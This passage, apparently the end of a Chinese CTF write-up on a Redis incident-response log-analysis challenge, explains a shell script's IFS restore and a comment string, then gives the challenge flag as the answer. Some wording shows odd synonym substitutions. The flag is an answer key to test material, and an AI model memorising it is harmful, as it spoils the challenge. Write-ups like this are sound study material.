[*] 恢复原始设置:

[*]IFS="$oldifs":恢复原始的字段分隔符设置。

[*] 注释部分:

[*]#//c195i2923381905517d818e313792d196:大概是作者用来标记或识别版本或修改的一部分。(待会提交一下试试看)

[*] 分析总结:

[*]这段脚本似乎是为了获取 ps_ 命令的输出,并按行处置惩罚和输出效果。ps_ 命令的具体功能和输出内容在这里并未具体说明,但可以我们可以推测这是一个对系统历程进行查询和处置惩罚的脚本。

总体来说,这段脚本看起来是为了实行某个定制的历程查询命令,并对输出进行简朴的格式化和显示。
尝试提交注释内容,发现提交正确;
flag{c195i2923381905517d818e313792d196}

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 玄机——第二章日志分析-redis应急相应 wp